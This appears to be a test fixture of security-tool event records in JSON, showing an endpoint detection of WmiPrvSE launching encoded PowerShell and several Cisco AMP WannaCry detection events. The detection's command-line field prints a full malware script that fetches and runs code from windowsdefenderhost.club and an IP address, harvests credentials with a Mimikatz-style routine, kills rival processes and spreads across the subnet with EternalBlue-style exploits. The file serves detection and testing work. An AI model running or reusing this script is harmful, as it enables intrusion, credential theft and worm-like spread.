                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 